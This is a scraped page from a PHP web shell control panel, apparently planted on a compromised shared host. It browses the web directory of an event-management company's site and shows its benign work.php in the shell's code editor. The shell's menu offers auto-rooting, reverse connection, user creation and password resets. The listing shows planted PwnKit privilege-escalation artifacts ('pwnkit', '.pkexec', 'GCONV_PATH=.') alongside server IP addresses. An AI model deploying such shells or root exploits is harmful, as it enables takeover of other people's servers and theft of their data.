Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 52.14.37.165
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
milovo /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_.htaccess
0
B
-rw-r--r--
about.php
9.12
KB
-rw-r--r--
blog.php
10.34
KB
-rw-r--r--
contact.php
5.91
KB
-rw-r--r--
gallery.php
3.8
KB
-rw-r--r--
indexold.html
36.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
service-single.php
5.35
KB
-rw-r--r--
services.php
5.31
KB
-rw-r--r--
team.php
16.6
KB
-rw-r--r--
work.php
5.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : work.php
<?php include("includes/header.php"); ?> <!--Page Title--> <section class="page-title" style="background-image:url(images/bg-parallax-01.jpg);"> <div class="container"> <h1>Our Work</h1> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li>Our Work</li> </ul> </div> </section> <!--End Page Title--> <!-- work data Detail --> <section class="work-text position-relative cmm-section"> <div class="container"> <div class="row"> <div class="image-column col-lg-4 col-md-12 col-sm-12"> <div class="work-img"> <img class="img-fluid" src="images/about-img-1.jpg" alt="work update"> </div> </div> <div class="info-column ps-5 col-lg-8 col-md-12 col-sm-12"> <div class="text-box"> <p>At Milovo Events, our work speaks for itself. We have successfully planned, designed, and executed a diverse range of events across various industries. From intimate gatherings to large-scale international conferences, our portfolio showcases our ability to deliver high-quality, impactful events tailored to meet the unique needs of our clients. </p> <ul> <li> Over 800 successful events</li> <li>200+ satisfied clients</li> <li> Events hosted in 60+ destinations worldwide, including India, Asia Pacific, UAE, and Europe </li> </ul> <!-- <div class="call-increase"> <h4>Sessions by Marke</h4> <div class="row"> <div class="col-lg-4 mb-4"> <div class="session-info"> <h5>800 +</h5> <span> Successful Events </span> <p>Planned, Designed & Hosted </p> </div> </div> <div class="col-lg-4 mb-4"> <div class="session-info"> <h5>200 +</h5> <span>Clients Satisfied </span> <p>Destinations Covered </p> </div> </div> <div class="col-lg-4 mb-4"> <div class="session-info"> <h5>60 +</h5> <span>Destinations Covered </span> <p> India, Asia Pacific, UAE & Europe </p> </div> </div> </div> </div> --> </div> </div> </div> <div class="clearfix"></div> <div class="sec-title my-4 text-center"> <span class="title mx-auto"> Your 360 Degree Event Solution </span> <h2>Our Work </h2> </div> <div class="row mt-4" id="ga-items"> <div class="gallery-item portfolio-item col-lg-4 col-md-6 col-sm-12 wow fadeIn"> <div class="position-relative"> <a href="images/about-img-1.jpg" data-fancybox="gallery" data-caption="Virgo"> <img src="images/about-img-1.jpg" /> </a> <div class="cn-name"> <h2 class="com-name">Company - <span>Virgo</span></h2> <p class="event-name">Event Name - <span>Dealers Meet</span> </p> </div> </div> </div> <!-- Gallery Item 1 --> <div class="gallery-item portfolio-item col-lg-4 col-md-6 col-sm-12 wow fadeIn"> <div class="position-relative"> <a href="images/about-img-1.jpg" data-fancybox="gallery" data-caption="Virgo"> <img src="images/about-img-1.jpg" /> </a> <div class="cn-name"> <h2 class="com-name">Company - <span>Virgo</span></h2> <p class="event-name">Event Name - <span>Dealers Meet</span> </p> </div> </div> </div> <!-- Gallery Item 1 --> <div class="gallery-item portfolio-item col-lg-4 col-md-6 col-sm-12 wow fadeIn"> <div class="position-relative"> <a href="images/about-img-1.jpg" data-fancybox="gallery" data-caption="Virgo"> <img src="images/about-img-1.jpg" /> </a> <div class="cn-name"> <h2 class="com-name">Company - <span>Virgo</span></h2> <p class="event-name">Event Name - <span>Dealers Meet</span> </p> </div> </div> </div> <!-- Gallery Item 1 --> <div class="gallery-item portfolio-item col-lg-4 col-md-6 col-sm-12 wow fadeIn"> <div class="position-relative"> <a href="images/about-img-1.jpg" data-fancybox="gallery" data-caption="Virgo"> <img src="images/about-img-1.jpg" /> </a> <div class="cn-name"> <h2 class="com-name">Company - <span>Virgo</span></h2> <p class="event-name">Event Name - <span>Dealers Meet</span> </p> </div> </div> </div> <!-- Gallery Item 1 --> <ul class="styled-pagination mt-4 text-center"> <li><a href="#">1</a></li> <li><a href="#" class="active">2</a></li> <li><a href="#">3</a></li> <li><a href="#"><span class="icon fa fa-angle-right"></span></a></li> </ul> </div> </div> </section> <!-- work data Detail --> <?php include("includes/footer.php"); ?>
Close